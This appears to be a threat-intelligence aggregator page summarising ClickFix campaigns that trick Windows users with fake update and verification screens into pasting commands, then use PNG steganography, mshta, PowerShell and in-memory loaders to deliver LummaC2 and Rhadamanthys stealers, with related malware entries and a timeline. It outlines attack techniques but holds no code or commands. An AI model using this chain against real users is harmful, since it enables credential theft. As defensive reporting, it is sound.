Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

ClickFix variants delivering LummaC2 and Rhadamanthys

Malware Activity
First reported
Last updated
Happening score
H score 21
2 unique sources, 2 articles

Summary

Hide ▲

Since October 1, ClickFix variants have been using a fake Windows Update screen and human verification lures to trick Windows users into pasting commands that execute malware. The chain hides payloads in PNG steganography and uses mshta and PowerShell to deliver LummaC2 and Rhadamanthys information stealers. The activity matters because the payload is reconstructed in memory, making the malicious delivery harder to spot and block.

Related Happenings

Godzilla (BLUEBEAM) web shell and Cobalt Strike deployment via KnowledgeDeliver exploitation

Malware Activity
First: 26.05.2026 08:19 Last: 26.05.2026 08:19 Sources 1

About this happening: The **Godzilla (BLUEBEAM)** web shell is now being used after **CVE-2026-5426** exploitation to run commands and stage **Cobalt Strike Beacon**, giving attackers a durable foothol...

Open Happening

Vidar infostealer market rise and distribution expansion

Malware Activity
First: 28.04.2026 22:07 Last: 28.04.2026 22:07 Sources 1

About this happening: **Vidar** remains a long-running **infostealer** threat, and **Aryaka** reported a fresh campaign in **recent weeks** that adds **new obfuscation techniques** and stronger **steal...

Open Happening

Venom Stealer MaaS continuous credential theft and exfiltration

Malware Activity
First: 01.04.2026 16:30 Last: 01.04.2026 16:30 Sources 1

About this happening: The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...

Open Happening

DeepLoad credential-stealing malware activity with WMI persistence

Malware Activity
First: 31.03.2026 00:25 Last: 31.03.2026 00:25 Sources 1

About this happening: The **DeepLoad** malware strain is stealing credentials immediately after infection, exposing **stored browser passwords**, **live keystrokes**, and **active accounts** in **enter...

Open Happening

BlackSanta EDR killer malware activity targeting HR departments

Malware Activity
First: 11.03.2026 00:57 Last: 11.03.2026 00:57 Sources 1

About this happening: The **BlackSanta** malware operation has run for **more than a year**, targeting **HR departments** and using an **EDR killer** to weaken host defenses before payload execution. T...

Open Happening

Timeline

  1. 24.11.2025 22:42 1 articles · 6mo ago

    ClickFix lures users with fake Windows Update pages

    Initial Disclosure

    ClickFix variants used a full-screen fake Windows Update page or a human verification lure to trick Windows users into pasting attacker-controlled commands into Windows Command Prompt and executing malware on the system.

    Show sources
    Open in new tab
  2. 24.11.2025 22:42 1 articles · 6mo ago

    Operation Endgame disrupts Rhadamanthys Windows Update delivery

    Campaign Scope Update

    On November 13, Operation Endgame disrupted a Rhadamanthys infrastructure segment behind the fake Windows Update lure, and payload delivery stopped on the affected fake Windows Update domains even though the domains remained active.

    Show sources
    Open in new tab
  3. 24.11.2025 22:42 2 articles · 6mo ago

    PNG steganography and in-memory payload reconstruction

    Technical Analysis Update

    ClickFix variants hid malicious code inside PNG images, used mshta and PowerShell to launch a multi-stage chain, and reconstructed an AES-encrypted payload in memory through a .NET assembly named Stego Loader and the Donut tool. The analyzed attacks delivered LummaC2 and Rhadamanthys information stealers and used ctrampoline evasion with 10,000 empty functions.

    Show sources
    Open in new tab